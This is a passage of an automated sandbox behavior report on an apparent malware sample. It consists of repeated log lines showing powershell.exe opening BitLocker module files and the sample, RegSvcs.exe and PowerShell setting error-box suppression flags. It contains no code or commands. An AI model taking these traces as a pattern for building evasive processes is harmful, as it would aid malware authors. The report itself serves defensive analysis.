                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
